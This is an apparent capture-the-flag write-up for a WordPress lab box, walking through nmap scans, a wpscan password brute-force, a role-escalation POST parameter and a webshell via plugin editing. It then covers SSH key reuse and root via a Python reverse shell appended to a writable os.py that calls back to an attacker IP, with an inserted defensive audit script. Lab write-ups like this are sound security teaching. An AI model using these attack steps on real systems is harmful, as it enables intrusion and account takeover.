Port scan

sudo nmap --min-rate 10000 -p- 10.10.194.143        
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-16 20:55 CST
Warning: 10.10.194.143 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.194.143
Host is up (0.23s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
sudo nmap -sT -sV -sC -O -p22,80 10.10.194.143         
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-16 20:56 CST
Nmap scan report for 10.10.194.143
Host is up (0.23s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3e:79:78:08:93:31:d0:83:7f:e2:bc:b6:14:bf:5d:9b (RSA)
| 256 3a:67:9f:af:7e:66:fa:e3:f8:c7:54:49:63:38:a2:93 (ECDSA)
|_ 256 8c:ef:55:b0:23:73:2c:14:09:45:22:ac:84:cb:40:d2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 5.3.2
|_http-title: Jack's Personal Site – Blog for Jacks writing adven...
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (96%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Sony Android TV (Android 5.0) (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Android 5.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap --script=vuln -p22,80 10.10.194.143       
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-16 20:56 CST
Nmap scan report for 10.10.194.143
Host is up (0.23s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.194.143
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.194.143:80/
| Form id: search
|_ Form action: http://jack.thm
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-wordpress-users:
| Username found: jack
| Username found: wendy
| Username found: danny
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| http-enum:
| /wp-login.php: Possible admin folder
| /wp-json: Possible admin folder
| /robots.txt: Robots file
| /readme.html: Wordpress version: 2
| /: WordPress version: 5.3.2
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
|_ /0/: Potentially interesting folder

Nmap done: 1 IP address (1 host up) scanned in 1006.43 seconds

Web

Looks like a WordPress site. Some pages won't load, so we apparently need to add a hosts entry for jack.thm. The scan above gave us three usernames (jack, wendy, danny), so let's try brute-forcing their passwords.

Not wanting to waste time, I checked the write-up, which uses this wordlist; the password isn't even in rockyou =.=

wpscan --url http://jack.thm/wp-login.php -U ./桌面/user.txt  -P /usr/share/wordlists/fasttrack.txt

wendy:changelater

After logging in we find we can't edit the theme to get a reverse shell; honestly, it would be too boring if we could. The version is 5.3.2, so I searched for vulnerabilities in this version. There is an RCE, but I couldn't get it to work with MSF. The THM hint says ure_other_roles. A search suggests a vulnerability in the configuration can be exploited.

Getshell

Click Profile, then Update Profile. Append '&ure_other_roles=administrator' to the end of the POST body and send the request. The left sidebar now shows many more entries. Editing PHP under Appearance still isn't possible this time, but plugins can be edited: pick akismet.php (editing any other plugin should work too).

Then visit http://jack.thm/wp-content/plugins/akismet/akismet.php

We get a shell.

user.txt in the home directory:

0052f7829e48752f2e7bf50f1231548a

Lateral movement

An id_rsa was found in /var/backups. I copied it to Kali to try cracking it, but it turns out no cracking is needed.

chmod 600 id_rsa
ssh -i id_rsa jack@jack.thm

Login successful.

No sudo, no crontab, nothing at all.

Privilege escalation

But in /opt/statuscheck/ there is a checker.py:

import os

os.system("/usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log")

But it turns out we can't run it, hmm, even though this is obviously the exploitation point. I checked the write-up, which used pspy (a tool that lets you watch other users' processes, such as cron jobs):

https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

Upload it to the target:

chmod +x pspy64
./pspy64

Now we can see that checker.py runs as a scheduled task. So we don't need to run it ourselves, but we can't modify it either. Perhaps we can modify the source of the os library instead:

locate os.py

/usr/lib/python2.7/os.py

We find we have permission to modify it.
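The root cron job above imports os from a file a normal user can write to, which is exactly what an auditor wants to catch before an attacker does. The following is an added defensive check, not code from the write-up or from THM; the search-path argument and the checker.py path are assumptions. It parses a scheduled script's imports with ast, resolves each to a file on disk and reports any module file or containing directory that is group/world-writable or not owned by root.

```python
# Added example (not from the write-up): audit a scheduled Python script for
# imports that a non-root user could modify, the weakness used against checker.py.
import ast
import importlib.machinery
import os
import stat
import sys

LOOSE_WRITE = stat.S_IWGRP | stat.S_IWOTH  # group- or world-writable bits


def imported_names(script_path):
    """Top-level module names a script imports (import x / from x import y)."""
    with open(script_path, "r", encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def loose_permissions(path):
    """Reasons a file or directory could be altered by a non-root user."""
    st = os.stat(path)
    problems = []
    if st.st_mode & LOOSE_WRITE:
        problems.append("mode %o allows group/world write" % stat.S_IMODE(st.st_mode))
    if st.st_uid != 0:
        problems.append("owned by uid %d, not root" % st.st_uid)
    return problems


def find_writable_modules(script_path, search_path=None):
    """Map each imported module to why it is tamperable; an empty dict means clean.
    The directory is checked too: a writable directory lets the file be replaced."""
    path = list(search_path) if search_path is not None else list(sys.path)
    findings = {}
    for name in imported_names(script_path):
        spec = importlib.machinery.PathFinder.find_spec(name, path)
        if spec is None or not spec.origin or not os.path.isfile(spec.origin):
            continue  # builtin or frozen module: nothing on disk to tamper with
        parent = os.path.dirname(spec.origin)
        reasons = ["%s: %s" % (spec.origin, p) for p in loose_permissions(spec.origin)]
        reasons += ["%s/: %s" % (parent, p) for p in loose_permissions(parent)]
        if reasons:
            findings[name] = reasons
    return findings
```

Run it as root against the cron script (for this box, find_writable_modules("/opt/statuscheck/checker.py")) with the interpreter the job actually uses, since the module path differs between Python 2 and 3.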

Append a reverse shell and start a listener on Kali:

echo 'import socket
import pty
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.38.245",1235))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")'>>os.py

It seems it has to be appended at the end? I tried putting it at the start and it didn't run.

Then we receive a reverse shell as root.

root.txt:

b8b63a861cc09e853f29d8055d64bffb

Ramblings

I've gained a broader understanding of WordPress exploits, and then there's pspy: scheduled tasks aren't just cat /etc/crontab, kora!!!